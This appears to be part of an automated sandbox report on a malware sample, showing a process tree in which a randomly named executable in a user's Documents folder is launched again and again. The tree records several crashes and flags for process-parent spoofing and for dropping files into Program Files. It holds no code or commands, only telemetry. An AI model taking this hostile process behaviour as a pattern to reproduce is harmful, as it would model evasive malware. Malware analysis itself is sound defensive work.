C:\Users\Admin\Documents\Jz7VtM0locwi5F4upWphwMwh.exeC:\Users\Admin\Documents\Jz7VtM0locwi5F4upWphwMwh.exe3⤵PID:10088
-
-
C:\Users\Admin\Documents\Jz7VtM0locwi5F4upWphwMwh.exeC:\Users\Admin\Documents\Jz7VtM0locwi5F4upWphwMwh.exe3⤵PID:9804
-
-
C:\Users\Admin\Documents\Jz7VtM0locwi5F4upWphwMwh.exeC:\Users\Admin\Documents\Jz7VtM0locwi5F4upWphwMwh.exe3⤵PID:5768
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5768 -s 284⤵
- Program crash
PID:10476
-
-
-
C:\Users\Admin\Documents\Jz7VtM0locwi5F4upWphwMwh.exeC:\Users\Admin\Documents\Jz7VtM0locwi5F4upWphwMwh.exe3⤵PID:10824
-
-
C:\Users\Admin\Documents\Jz7VtM0locwi5F4upWphwMwh.exeC:\Users\Admin\Documents\Jz7VtM0locwi5F4upWphwMwh.exe3⤵PID:11004
-
-
C:\Users\Admin\Documents\Jz7VtM0locwi5F4upWphwMwh.exeC:\Users\Admin\Documents\Jz7VtM0locwi5F4upWphwMwh.exe3⤵PID:9172
-
-
C:\Users\Admin\Documents\Jz7VtM0locwi5F4upWphwMwh.exeC:\Users\Admin\Documents\Jz7VtM0locwi5F4upWphwMwh.exe3⤵PID:2848
-
-
C:\Users\Admin\Documents\Jz7VtM0locwi5F4upWphwMwh.exeC:\Users\Admin\Documents\Jz7VtM0locwi5F4upWphwMwh.exe3⤵PID:11416
-
-
C:\Users\Admin\Documents\Jz7VtM0locwi5F4upWphwMwh.exeC:\Users\Admin\Documents\Jz7VtM0locwi5F4upWphwMwh.exe3⤵PID:11376
-
-
C:\Users\Admin\Documents\Jz7VtM0locwi5F4upWphwMwh.exeC:\Users\Admin\Documents\Jz7VtM0locwi5F4upWphwMwh.exe3⤵PID:11764
-
-
C:\Users\Admin\Documents\Jz7VtM0locwi5F4upWphwMwh.exeC:\Users\Admin\Documents\Jz7VtM0locwi5F4upWphwMwh.exe3⤵PID:11560
-
-
C:\Users\Admin\Documents\Jz7VtM0locwi5F4upWphwMwh.exeC:\Users\Admin\Documents\Jz7VtM0locwi5F4upWphwMwh.exe3⤵PID:10872
-
-
C:\Users\Admin\Documents\Jz7VtM0locwi5F4upWphwMwh.exeC:\Users\Admin\Documents\Jz7VtM0locwi5F4upWphwMwh.exe3⤵PID:9324
-
-
C:\Users\Admin\Documents\Jz7VtM0locwi5F4upWphwMwh.exeC:\Users\Admin\Documents\Jz7VtM0locwi5F4upWphwMwh.exe3⤵PID:10928
-
-
C:\Users\Admin\Documents\Jz7VtM0locwi5F4upWphwMwh.exeC:\Users\Admin\Documents\Jz7VtM0locwi5F4upWphwMwh.exe3⤵PID:1400
-
-
C:\Users\Admin\Documents\Jz7VtM0locwi5F4upWphwMwh.exeC:\Users\Admin\Documents\Jz7VtM0locwi5F4upWphwMwh.exe3⤵PID:9392
-
-
C:\Users\Admin\Documents\Jz7VtM0locwi5F4upWphwMwh.exeC:\Users\Admin\Documents\Jz7VtM0locwi5F4upWphwMwh.exe3⤵PID:9328
-
-
C:\Users\Admin\Documents\Jz7VtM0locwi5F4upWphwMwh.exeC:\Users\Admin\Documents\Jz7VtM0locwi5F4upWphwMwh.exe3⤵PID:10288
-
-
C:\Users\Admin\Documents\Jz7VtM0locwi5F4upWphwMwh.exeC:\Users\Admin\Documents\Jz7VtM0locwi5F4upWphwMwh.exe3⤵PID:11172
-
-
C:\Users\Admin\Documents\Jz7VtM0locwi5F4upWphwMwh.exeC:\Users\Admin\Documents\Jz7VtM0locwi5F4upWphwMwh.exe3⤵PID:9228
-
-
C:\Users\Admin\Documents\Jz7VtM0locwi5F4upWphwMwh.exeC:\Users\Admin\Documents\Jz7VtM0locwi5F4upWphwMwh.exe3⤵PID:4444
-
-
C:\Users\Admin\Documents\Jz7VtM0locwi5F4upWphwMwh.exeC:\Users\Admin\Documents\Jz7VtM0locwi5F4upWphwMwh.exe3⤵PID:11684
-
-
C:\Users\Admin\Documents\Jz7VtM0locwi5F4upWphwMwh.exeC:\Users\Admin\Documents\Jz7VtM0locwi5F4upWphwMwh.exe3⤵PID:12424
-
-
C:\Users\Admin\Documents\Jz7VtM0locwi5F4upWphwMwh.exeC:\Users\Admin\Documents\Jz7VtM0locwi5F4upWphwMwh.exe3⤵PID:8296
-
-
C:\Users\Admin\Documents\Jz7VtM0locwi5F4upWphwMwh.exeC:\Users\Admin\Documents\Jz7VtM0locwi5F4upWphwMwh.exe3⤵PID:12680
-
-
C:\Users\Admin\Documents\Jz7VtM0locwi5F4upWphwMwh.exeC:\Users\Admin\Documents\Jz7VtM0locwi5F4upWphwMwh.exe3⤵PID:13008
-
-
C:\Users\Admin\Documents\Jz7VtM0locwi5F4upWphwMwh.exeC:\Users\Admin\Documents\Jz7VtM0locwi5F4upWphwMwh.exe3⤵PID:13180
-
-
C:\Users\Admin\Documents\Jz7VtM0locwi5F4upWphwMwh.exeC:\Users\Admin\Documents\Jz7VtM0locwi5F4upWphwMwh.exe3⤵PID:12472
-
-
C:\Users\Admin\Documents\Jz7VtM0locwi5F4upWphwMwh.exeC:\Users\Admin\Documents\Jz7VtM0locwi5F4upWphwMwh.exe3⤵PID:11756
-
-
C:\Users\Admin\Documents\Jz7VtM0locwi5F4upWphwMwh.exeC:\Users\Admin\Documents\Jz7VtM0locwi5F4upWphwMwh.exe3⤵PID:12864
-
-
C:\Users\Admin\Documents\Jz7VtM0locwi5F4upWphwMwh.exeC:\Users\Admin\Documents\Jz7VtM0locwi5F4upWphwMwh.exe3⤵PID:2172
-
-
C:\Users\Admin\Documents\Jz7VtM0locwi5F4upWphwMwh.exeC:\Users\Admin\Documents\Jz7VtM0locwi5F4upWphwMwh.exe3⤵PID:6632
-
-
C:\Users\Admin\Documents\Jz7VtM0locwi5F4upWphwMwh.exeC:\Users\Admin\Documents\Jz7VtM0locwi5F4upWphwMwh.exe3⤵PID:12228
-
-
C:\Users\Admin\Documents\Jz7VtM0locwi5F4upWphwMwh.exeC:\Users\Admin\Documents\Jz7VtM0locwi5F4upWphwMwh.exe3⤵PID:1156
-
-
C:\Users\Admin\Documents\Jz7VtM0locwi5F4upWphwMwh.exeC:\Users\Admin\Documents\Jz7VtM0locwi5F4upWphwMwh.exe3⤵PID:11812
-
-
C:\Users\Admin\Documents\Jz7VtM0locwi5F4upWphwMwh.exeC:\Users\Admin\Documents\Jz7VtM0locwi5F4upWphwMwh.exe3⤵PID:12488
-
-
C:\Users\Admin\Documents\Jz7VtM0locwi5F4upWphwMwh.exeC:\Users\Admin\Documents\Jz7VtM0locwi5F4upWphwMwh.exe3⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
PID:5484
-
-
C:\Users\Admin\Documents\Jz7VtM0locwi5F4upWphwMwh.exeC:\Users\Admin\Documents\Jz7VtM0locwi5F4upWphwMwh.exe3⤵PID:9284
-
-
C:\Users\Admin\Documents\Jz7VtM0locwi5F4upWphwMwh.exeC:\Users\Admin\Documents\Jz7VtM0locwi5F4upWphwMwh.exe3⤵PID:12876
-
-
C:\Users\Admin\Documents\Jz7VtM0locwi5F4upWphwMwh.exeC:\Users\Admin\Documents\Jz7VtM0locwi5F4upWphwMwh.exe3⤵PID:12448
-
-
C:\Users\Admin\Documents\Jz7VtM0locwi5F4upWphwMwh.exeC:\Users\Admin\Documents\Jz7VtM0locwi5F4upWphwMwh.exe3⤵PID:2976
-
-
C:\Users\Admin\Documents\Jz7VtM0locwi5F4upWphwMwh.exeC:\Users\Admin\Documents\Jz7VtM0locwi5F4upWphwMwh.exe3⤵PID:7340
-
-
C:\Users\Admin\Documents\Jz7VtM0locwi5F4upWphwMwh.exeC:\Users\Admin\Documents\Jz7VtM0locwi5F4upWphwMwh.exe3⤵PID:11024
-
-
C:\Users\Admin\Documents\Jz7VtM0locwi5F4upWphwMwh.exeC:\Users\Admin\Documents\Jz7VtM0locwi5F4upWphwMwh.exe3⤵PID:2508
-
-
C:\Users\Admin\Documents\Jz7VtM0locwi5F4upWphwMwh.exeC:\Users\Admin\Documents\Jz7VtM0locwi5F4upWphwMwh.exe3⤵PID:11604
-
-
C:\Users\Admin\Documents\Jz7VtM0locwi5F4upWphwMwh.exeC:\Users\Admin\Documents\Jz7VtM0locwi5F4upWphwMwh.exe3⤵PID:11908
-
-
C:\Users\Admin\Documents\Jz7VtM0locwi5F4upWphwMwh.exeC:\Users\Admin\Documents\Jz7VtM0locwi5F4upWphwMwh.exe3⤵PID:8728
-
-
C:\Users\Admin\Documents\Jz7VtM0locwi5F4upWphwMwh.exeC:\Users\Admin\Documents\Jz7VtM0locwi5F4upWphwMwh.exe3⤵PID:10540
-
-
C:\Users\Admin\Documents\Jz7VtM0locwi5F4upWphwMwh.exeC:\Users\Admin\Documents\Jz7VtM0locwi5F4upWphwMwh.exe3⤵PID:12224
-
-
C:\Users\Admin\Documents\Jz7VtM0locwi5F4upWphwMwh.exeC:\Users\Admin\Documents\Jz7VtM0locwi5F4upWphwMwh.exe3⤵PID:2668
-
-
C:\Users\Admin\Documents\Jz7VtM0locwi5F4upWphwMwh.exeC:\Users\Admin\Documents\Jz7VtM0locwi5F4upWphwMwh.exe3⤵PID:11680
-
-
C:\Users\Admin\Documents\Jz7VtM0locwi5F4upWphwMwh.exeC:\Users\Admin\Documents\Jz7VtM0locwi5F4upWphwMwh.exe3⤵PID:7592
-
-
C:\Users\Admin\Documents\Jz7VtM0locwi5F4upWphwMwh.exeC:\Users\Admin\Documents\Jz7VtM0locwi5F4upWphwMwh.exe3⤵PID:8448
-
-
C:\Users\Admin\Documents\Jz7VtM0locwi5F4upWphwMwh.exeC:\Users\Admin\Documents\Jz7VtM0locwi5F4upWphwMwh.exe3⤵PID:7976
-
-
C:\Users\Admin\Documents\Jz7VtM0locwi5F4upWphwMwh.exeC:\Users\Admin\Documents\Jz7VtM0locwi5F4upWphwMwh.exe3⤵PID:10820
-
-
C:\Users\Admin\Documents\Jz7VtM0locwi5F4upWphwMwh.exeC:\Users\Admin\Documents\Jz7VtM0locwi5F4upWphwMwh.exe3⤵PID:7824
-
-
C:\Users\Admin\Documents\Jz7VtM0locwi5F4upWphwMwh.exeC:\Users\Admin\Documents\Jz7VtM0locwi5F4upWphwMwh.exe3⤵PID:6620
-
-
C:\Users\Admin\Documents\Jz7VtM0locwi5F4upWphwMwh.exeC:\Users\Admin\Documents\Jz7VtM0locwi5F4upWphwMwh.exe3⤵PID:8688
-
-
C:\Users\Admin\Documents\Jz7VtM0locwi5F4upWphwMwh.exeC:\Users\Admin\Documents\Jz7VtM0locwi5F4upWphwMwh.exe3⤵PID:4476
-
-
C:\Users\Admin\Documents\Jz7VtM0locwi5F4upWphwMwh.exeC:\Users\Admin\Documents\Jz7VtM0locwi5F4upWphwMwh.exe3⤵PID:11124
-
-
C:\Users\Admin\Documents\Jz7VtM0locwi5F4upWphwMwh.exeC:\Users\Admin\Documents\Jz7VtM0locwi5F4upWphwMwh.exe3⤵PID:8368
-
-
C:\Users\Admin\Documents\Jz7VtM0locwi5F4upWphwMwh.exeC:\Users\Admin\Documents\Jz7VtM0locwi5F4upWphwMwh.exe3⤵PID:9064
-
-
C:\Users\Admin\Documents\Jz7VtM0locwi5F4upWphwMwh.exeC:\Users\Admin\Documents\Jz7VtM0locwi5F4upWphwMwh.exe3⤵PID:8460
-
-
C:\Users\Admin\Documents\Jz7VtM0locwi5F4upWphwMwh.exeC:\Users\Admin\Documents\Jz7VtM0locwi5F4upWphwMwh.exe3⤵PID:10932
-
-
C:\Users\Admin\Documents\Jz7VtM0locwi5F4upWphwMwh.exeC:\Users\Admin\Documents\Jz7VtM0locwi5F4upWphwMwh.exe3⤵PID:4312
-
-
C:\Users\Admin\Documents\Jz7VtM0locwi5F4upWphwMwh.exeC:\Users\Admin\Documents\Jz7VtM0locwi5F4upWphwMwh.exe3⤵PID:11856
-
-
C:\Users\Admin\Documents\Jz7VtM0locwi5F4upWphwMwh.exeC:\Users\Admin\Documents\Jz7VtM0locwi5F4upWphwMwh.exe3⤵PID:12892
-
-
C:\Users\Admin\Documents\Jz7VtM0locwi5F4upWphwMwh.exeC:\Users\Admin\Documents\Jz7VtM0locwi5F4upWphwMwh.exe3⤵PID:8484
-
-
C:\Users\Admin\Documents\Jz7VtM0locwi5F4upWphwMwh.exeC:\Users\Admin\Documents\Jz7VtM0locwi5F4upWphwMwh.exe3⤵PID:2688
-
-
C:\Users\Admin\Documents\Jz7VtM0locwi5F4upWphwMwh.exeC:\Users\Admin\Documents\Jz7VtM0locwi5F4upWphwMwh.exe3⤵PID:8020
-
-
C:\Users\Admin\Documents\Jz7VtM0locwi5F4upWphwMwh.exeC:\Users\Admin\Documents\Jz7VtM0locwi5F4upWphwMwh.exe3⤵PID:1972
-
-
C:\Users\Admin\Documents\Jz7VtM0locwi5F4upWphwMwh.exeC:\Users\Admin\Documents\Jz7VtM0locwi5F4upWphwMwh.exe3⤵PID:8312
-
-
C:\Users\Admin\Documents\Jz7VtM0locwi5F4upWphwMwh.exeC:\Users\Admin\Documents\Jz7VtM0locwi5F4upWphwMwh.exe3⤵PID:9864
-
-
C:\Users\Admin\Documents\Jz7VtM0locwi5F4upWphwMwh.exeC:\Users\Admin\Documents\Jz7VtM0locwi5F4upWphwMwh.exe3⤵PID:13256
-
-
C:\Users\Admin\Documents\Jz7VtM0locwi5F4upWphwMwh.exeC:\Users\Admin\Documents\Jz7VtM0locwi5F4upWphwMwh.exe3⤵PID:12520
-
-
C:\Users\Admin\Documents\Jz7VtM0locwi5F4upWphwMwh.exeC:\Users\Admin\Documents\Jz7VtM0locwi5F4upWphwMwh.exe3⤵PID:9712
-
-
C:\Users\Admin\Documents\Jz7VtM0locwi5F4upWphwMwh.exeC:\Users\Admin\Documents\Jz7VtM0locwi5F4upWphwMwh.exe3⤵PID:9704
-
-
C:\Users\Admin\Documents\Jz7VtM0locwi5F4upWphwMwh.exeC:\Users\Admin\Documents\Jz7VtM0locwi5F4upWphwMwh.exe3⤵PID:11444
-
-
C:\Users\Admin\Documents\Jz7VtM0locwi5F4upWphwMwh.exeC:\Users\Admin\Documents\Jz7VtM0locwi5F4upWphwMwh.exe3⤵PID:12652
-
-
C:\Users\Admin\Documents\Jz7VtM0locwi5F4upWphwMwh.exeC:\Users\Admin\Documents\Jz7VtM0locwi5F4upWphwMwh.exe3⤵PID:11044
-
-
C:\Users\Admin\Documents\Jz7VtM0locwi5F4upWphwMwh.exeC:\Users\Admin\Documents\Jz7VtM0locwi5F4upWphwMwh.exe3⤵PID:12688
-
-
C:\Users\Admin\Documents\Jz7VtM0locwi5F4upWphwMwh.exeC:\Users\Admin\Documents\Jz7VtM0locwi5F4upWphwMwh.exe3⤵PID:9436
-
-
C:\Users\Admin\Documents\Jz7VtM0locwi5F4upWphwMwh.exeC:\Users\Admin\Documents\Jz7VtM0locwi5F4upWphwMwh.exe3⤵PID:13068
-
-
C:\Users\Admin\Documents\Jz7VtM0locwi5F4upWphwMwh.exeC:\Users\Admin\Documents\Jz7VtM0locwi5F4upWphwMwh.exe3⤵PID:3828
-
-
C:\Users\Admin\Documents\Jz7VtM0locwi5F4upWphwMwh.exeC:\Users\Admin\Documents\Jz7VtM0locwi5F4upWphwMwh.exe3⤵PID:4172
-
-
C:\Users\Admin\Documents\Jz7VtM0locwi5F4upWphwMwh.exeC:\Users\Admin\Documents\Jz7VtM0locwi5F4upWphwMwh.exe3⤵PID:8528
-
-
C:\Users\Admin\Documents\Jz7VtM0locwi5F4upWphwMwh.exeC:\Users\Admin\Documents\Jz7VtM0locwi5F4upWphwMwh.exe3⤵PID:4988
-
-
C:\Users\Admin\Documents\Jz7VtM0locwi5F4upWphwMwh.exeC:\Users\Admin\Documents\Jz7VtM0locwi5F4upWphwMwh.exe3⤵PID:5504
-
-
C:\Users\Admin\Documents\Jz7VtM0locwi5F4upWphwMwh.exeC:\Users\Admin\Documents\Jz7VtM0locwi5F4upWphwMwh.exe3⤵PID:8488
-
-
C:\Users\Admin\Documents\Jz7VtM0locwi5F4upWphwMwh.exeC:\Users\Admin\Documents\Jz7VtM0locwi5F4upWphwMwh.exe3⤵PID:4368
-
-
C:\Users\Admin\Documents\Jz7VtM0locwi5F4upWphwMwh.exeC:\Users\Admin\Documents\Jz7VtM0locwi5F4upWphwMwh.exe3⤵PID:9268
-
-
C:\Users\Admin\Documents\Jz7VtM0locwi5F4upWphwMwh.exeC:\Users\Admin\Documents\Jz7VtM0locwi5F4upWphwMwh.exe3⤵PID:8656
-
-
C:\Users\Admin\Documents\Jz7VtM0locwi5F4upWphwMwh.exeC:\Users\Admin\Documents\Jz7VtM0locwi5F4upWphwMwh.exe3⤵PID:5976
-
-
C:\Users\Admin\Documents\Jz7VtM0locwi5F4upWphwMwh.exeC:\Users\Admin\Documents\Jz7VtM0locwi5F4upWphwMwh.exe3⤵PID:3512
-
-
C:\Users\Admin\Documents\Jz7VtM0locwi5F4upWphwMwh.exeC:\Users\Admin\Documents\Jz7VtM0locwi5F4upWphwMwh.exe3⤵PID:12256
-
-
C:\Users\Admin\Documents\Jz7VtM0locwi5F4upWphwMwh.exeC:\Users\Admin\Documents\Jz7VtM0locwi5F4upWphwMwh.exe3⤵PID:7012
-
-
C:\Users\Admin\Documents\Jz7VtM0locwi5F4upWphwMwh.exeC:\Users\Admin\Documents\Jz7VtM0locwi5F4upWphwMwh.exe3⤵PID:4004
-
-
C:\Users\Admin\Documents\Jz7VtM0locwi5F4upWphwMwh.exeC:\Users\Admin\Documents\Jz7VtM0locwi5F4upWphwMwh.exe3⤵PID:8244
-
-
C:\Users\Admin\Documents\Jz7VtM0locwi5F4upWphwMwh.exeC:\Users\Admin\Documents\Jz7VtM0locwi5F4upWphwMwh.exe3⤵PID:10936
-
-
C:\Users\Admin\Documents\Jz7VtM0locwi5F4upWphwMwh.exeC:\Users\Admin\Documents\Jz7VtM0locwi5F4upWphwMwh.exe3⤵PID:11248
-
-
C:\Users\Admin\Documents\Jz7VtM0locwi5F4upWphwMwh.exeC:\Users\Admin\Documents\Jz7VtM0locwi5F4upWphwMwh.exe3⤵PID:4864
-
-
C:\Users\Admin\Documents\Jz7VtM0locwi5F4upWphwMwh.exeC:\Users\Admin\Documents\Jz7VtM0locwi5F4upWphwMwh.exe3⤵PID:12896
-
-
C:\Users\Admin\Documents\Jz7VtM0locwi5F4upWphwMwh.exeC:\Users\Admin\Documents\Jz7VtM0locwi5F4upWphwMwh.exe3⤵PID:7784
-
-
C:\Users\Admin\Documents\Jz7VtM0locwi5F4upWphwMwh.exeC:\Users\Admin\Documents\Jz7VtM0locwi5F4upWphwMwh.exe3⤵PID:8760
-
-
C:\Users\Admin\Documents\Jz7VtM0locwi5F4upWphwMwh.exeC:\Users\Admin\Documents\Jz7VtM0locwi5F4upWphwMwh.exe3⤵PID:3428
-
-
C:\Users\Admin\Documents\Jz7VtM0locwi5F4upWphwMwh.exeC:\Users\Admin\Documents\Jz7VtM0locwi5F4upWphwMwh.exe3⤵PID:6956
-
-
C:\Users\Admin\Documents\Jz7VtM0locwi5F4upWphwMwh.exeC:\Users\Admin\Documents\Jz7VtM0locwi5F4upWphwMwh.exe3⤵PID:8004
-
-
C:\Users\Admin\Documents\Jz7VtM0locwi5F4upWphwMwh.exeC:\Users\Admin\Documents\Jz7VtM0locwi5F4upWphwMwh.exe3⤵PID:11608
-
-
C:\Users\Admin\Documents\Jz7VtM0locwi5F4upWphwMwh.exeC:\Users\Admin\Documents\Jz7VtM0locwi5F4upWphwMwh.exe3⤵PID:12280
-
-
C:\Users\Admin\Documents\Jz7VtM0locwi5F4upWphwMwh.exeC:\Users\Admin\Documents\Jz7VtM0locwi5F4upWphwMwh.exe3⤵PID:9904
-
-
C:\Users\Admin\Documents\Jz7VtM0locwi5F4upWphwMwh.exeC:\Users\Admin\Documents\Jz7VtM0locwi5F4upWphwMwh.exe3⤵PID:11916
-
-
C:\Users\Admin\Documents\Jz7VtM0locwi5F4upWphwMwh.exeC:\Users\Admin\Documents\Jz7VtM0locwi5F4upWphwMwh.exe3⤵PID:10380
-
-
C:\Users\Admin\Documents\Jz7VtM0locwi5F4upWphwMwh.exeC:\Users\Admin\Documents\Jz7VtM0locwi5F4upWphwMwh.exe3⤵PID:3832
-
-
C:\Users\Admin\Documents\Jz7VtM0locwi5F4upWphwMwh.exeC:\Users\Admin\Documents\Jz7VtM0locwi5F4upWphwMwh.exe3⤵PID:8400
-
-
C:\Users\Admin\Documents\Jz7VtM0locwi5F4upWphwMwh.exeC:\Users\Admin\Documents\Jz7VtM0locwi5F4upWphwMwh.exe3⤵PID:1604
-
-
C:\Users\Admin\Documents\Jz7VtM0locwi5F4upWphwMwh.exeC:\Users\Admin\Documents\Jz7VtM0locwi5F4upWphwMwh.exe3⤵PID:12900
-
-
C:\Users\Admin\Documents\Jz7VtM0locwi5F4upWphwMwh.exeC:\Users\Admin\Documents\Jz7VtM0locwi5F4upWphwMwh.exe3⤵PID:9288
-
-
C:\Users\Admin\Documents\Jz7VtM0locwi5F4upWphwMwh.exeC:\Users\Admin\Documents\Jz7VtM0locwi5F4upWphwMwh.exe3⤵PID:12724
-
-
C:\Users\Admin\Documents\Jz7VtM0locwi5F4upWphwMwh.exeC:\Users\Admin\Documents\Jz7VtM0locwi5F4upWphwMwh.exe3⤵PID:8740
-
-
C:\Users\Admin\Documents\Jz7VtM0locwi5F4upWphwMwh.exeC:\Users\Admin\Documents\Jz7VtM0locwi5F4upWphwMwh.exe3⤵PID:5264
-
-
C:\Users\Admin\Documents\Jz7VtM0locwi5F4upWphwMwh.exeC:\Users\Admin\Documents\Jz7VtM0locwi5F4upWphwMwh.exe3⤵PID:5492
-
-
C:\Users\Admin\Documents\Jz7VtM0locwi5F4upWphwMwh.exeC:\Users\Admin\Documents\Jz7VtM0locwi5F4upWphwMwh.exe3⤵PID:1580
-
-
C:\Users\Admin\Documents\Jz7VtM0locwi5F4upWphwMwh.exeC:\Users\Admin\Documents\Jz7VtM0locwi5F4upWphwMwh.exe3⤵PID:9420
-
-
C:\Users\Admin\Documents\Jz7VtM0locwi5F4upWphwMwh.exeC:\Users\Admin\Documents\Jz7VtM0locwi5F4upWphwMwh.exe3⤵PID:5084
-
-
C:\Users\Admin\Documents\Jz7VtM0locwi5F4upWphwMwh.exeC:\Users\Admin\Documents\Jz7VtM0locwi5F4upWphwMwh.exe3⤵PID:11184
-
-
C:\Users\Admin\Documents\Jz7VtM0locwi5F4upWphwMwh.exeC:\Users\Admin\Documents\Jz7VtM0locwi5F4upWphwMwh.exe3⤵PID:12440
-
-
C:\Users\Admin\Documents\Jz7VtM0locwi5F4upWphwMwh.exeC:\Users\Admin\Documents\Jz7VtM0locwi5F4upWphwMwh.exe3⤵PID:10184
-
-
C:\Users\Admin\Documents\Jz7VtM0locwi5F4upWphwMwh.exeC:\Users\Admin\Documents\Jz7VtM0locwi5F4upWphwMwh.exe3⤵PID:10500
-
-
C:\Users\Admin\Documents\Jz7VtM0locwi5F4upWphwMwh.exeC:\Users\Admin\Documents\Jz7VtM0locwi5F4upWphwMwh.exe3⤵PID:12120
-
-
C:\Users\Admin\Documents\Jz7VtM0locwi5F4upWphwMwh.exeC:\Users\Admin\Documents\Jz7VtM0locwi5F4upWphwMwh.exe3⤵PID:8024
-
-
C:\Users\Admin\Documents\Jz7VtM0locwi5F4upWphwMwh.exeC:\Users\Admin\Documents\Jz7VtM0locwi5F4upWphwMwh.exe3⤵PID:1204
-
-
C:\Users\Admin\Documents\Jz7VtM0locwi5F4upWphwMwh.exeC:\Users\Admin\Documents\Jz7VtM0locwi5F4upWphwMwh.exe3⤵PID:13084
-
-
C:\Users\Admin\Documents\Jz7VtM0locwi5F4upWphwMwh.exeC:\Users\Admin\Documents\Jz7VtM0locwi5F4upWphwMwh.exe3⤵PID:8668
-
-
C:\Users\Admin\Documents\Jz7VtM0locwi5F4upWphwMwh.exeC:\Users\Admin\Documents\Jz7VtM0locwi5F4upWphwMwh.exe3⤵PID:400
-
-
C:\Users\Admin\Documents\Jz7VtM0locwi5F4upWphwMwh.exeC:\Users\Admin\Documents\Jz7VtM0locwi5F4upWphwMwh.exe3⤵PID:9164
-
-
C:\Users\Admin\Documents\Jz7VtM0locwi5F4upWphwMwh.exeC:\Users\Admin\Documents\Jz7VtM0locwi5F4upWphwMwh.exe3⤵PID:12400
-
-
C:\Users\Admin\Documents\Jz7VtM0locwi5F4upWphwMwh.exeC:\Users\Admin\Documents\Jz7VtM0locwi5F4upWphwMwh.exe3⤵PID:2448
-
-
C:\Users\Admin\Documents\Jz7VtM0locwi5F4upWphwMwh.exeC:\Users\Admin\Documents\Jz7VtM0locwi5F4upWphwMwh.exe3⤵PID:10308
-
-
C:\Users\Admin\Documents\Jz7VtM0locwi5F4upWphwMwh.exeC:\Users\Admin\Documents\Jz7VtM0locwi5F4upWphwMwh.exe3⤵PID:9028
-
-
C:\Users\Admin\Documents\Jz7VtM0locwi5F4upWphwMwh.exeC:\Users\Admin\Documents\Jz7VtM0locwi5F4upWphwMwh.exe3⤵PID:8404
-
-
C:\Users\Admin\Documents\Jz7VtM0locwi5F4upWphwMwh.exeC:\Users\Admin\Documents\Jz7VtM0locwi5F4upWphwMwh.exe3⤵PID:6880
-
-
C:\Users\Admin\Documents\Jz7VtM0locwi5F4upWphwMwh.exeC:\Users\Admin\Documents\Jz7VtM0locwi5F4upWphwMwh.exe3⤵PID:2136
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2136 -s 284⤵
- Drops file in Program Files directory
- Program crash
PID:7480
-
-
-
C:\Users\Admin\Documents\Jz7VtM0locwi5F4upWphwMwh.exeC:\Users\Admin\Documents\Jz7VtM0locwi5F4upWphwMwh.exe3⤵PID:5560
-
-
C:\Users\Admin\Documents\Jz7VtM0locwi5F4upWphwMwh.exeC:\Users\Admin\Documents\Jz7VtM0locwi5F4upWphwMwh.exe3⤵PID:2908
-
-
C:\Users\Admin\Documents\Jz7VtM0locwi5F4upWphwMwh.exeC:\Users\Admin\Documents\Jz7VtM0locwi5F4upWphwMwh.exe3⤵PID:2060
-
-
C:\Users\Admin\Documents\Jz7VtM0locwi5F4upWphwMwh.exeC:\Users\Admin\Documents\Jz7VtM0locwi5F4upWphwMwh.exe3⤵PID:12832
-
-
C:\Users\Admin\Documents\Jz7VtM0locwi5F4upWphwMwh.exeC:\Users\Admin\Documents\Jz7VtM0locwi5F4upWphwMwh.exe3⤵PID:10620
-
-
C:\Users\Admin\Documents\Jz7VtM0locwi5F4upWphwMwh.exeC:\Users\Admin\Documents\Jz7VtM0locwi5F4upWphwMwh.exe3⤵PID:10728
-
-
C:\Users\Admin\Documents\Jz7VtM0locwi5F4upWphwMwh.exeC:\Users\Admin\Documents\Jz7VtM0locwi5F4upWphwMwh.exe3⤵PID:10128
-
-
C:\Users\Admin\Documents\Jz7VtM0locwi5F4upWphwMwh.exeC:\Users\Admin\Documents\Jz7VtM0locwi5F4upWphwMwh.exe3⤵PID:9684
-
-
C:\Users\Admin\Documents\Jz7VtM0locwi5F4upWphwMwh.exeC:\Users\Admin\Documents\Jz7VtM0locwi5F4upWphwMwh.exe3⤵PID:12012
-
-
C:\Users\Admin\Documents\Jz7VtM0locwi5F4upWphwMwh.exeC:\Users\Admin\Documents\Jz7VtM0locwi5F4upWphwMwh.exe3⤵PID:9276
-
-
C:\Users\Admin\Documents\Jz7VtM0locwi5F4upWphwMwh.exeC:\Users\Admin\Documents\Jz7VtM0locwi5F4upWphwMwh.exe3⤵PID:11168
-
-
C:\Users\Admin\Documents\Jz7VtM0locwi5F4upWphwMwh.exeC:\Users\Admin\Documents\Jz7VtM0locwi5F4upWphwMwh.exe3⤵PID:12104
-
-
C:\Users\Admin\Documents\Jz7VtM0locwi5F4upWphwMwh.exeC:\Users\Admin\Documents\Jz7VtM0locwi5F4upWphwMwh.exe3⤵PID:652
-
-
C:\Users\Admin\Documents\Jz7VtM0locwi5F4upWphwMwh.exeC:\Users\Admin\Documents\Jz7VtM0locwi5F4upWphwMwh.exe3⤵PID:6200
-
-
C:\Users\Admin\Documents\Jz7VtM0locwi5F4upWphwMwh.exeC:\Users\Admin\Documents\Jz7VtM0locwi5F4upWphwMwh.exe3⤵PID:10252
-
-
C:\Users\Admin\Documents\Jz7VtM0locwi5F4upWphwMwh.exeC:\Users\Admin\Documents\Jz7VtM0locwi5F4upWphwMwh.exe3⤵PID:13064
-
-
C:\Users\Admin\Documents\Jz7VtM0locwi5F4upWphwMwh.exeC:\Users\Admin\Documents\Jz7VtM0locwi5F4upWphwMwh.exe3⤵PID:12460
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 12460 -s 284⤵
- Program crash
PID:8788
-
-
-
C:\Users\Admin\Documents\Jz7VtM0locwi5F4upWphwMwh.exeC:\Users\Admin\Documents\Jz7VtM0locwi5F4upWphwMwh.exe3⤵PID:8776
-
-
C:\Users\Admin\Documents\Jz7VtM0locwi5F4upWphwMwh.exeC:\Users\Admin\Documents\Jz7VtM0locwi5F4upWphwMwh.exe3⤵PID:2256
-
-
C:\Users\Admin\Documents\Jz7VtM0locwi5F4upWphwMwh.exeC:\Users\Admin\Documents\Jz7VtM0locwi5F4upWphwMwh.exe3⤵PID:12232
-
-
C:\Users\Admin\Documents\Jz7VtM0locwi5F4upWphwMwh.exeC:\Users\Admin\Documents\Jz7VtM0locwi5F4upWphwMwh.exe3⤵PID:9208
-
-
-
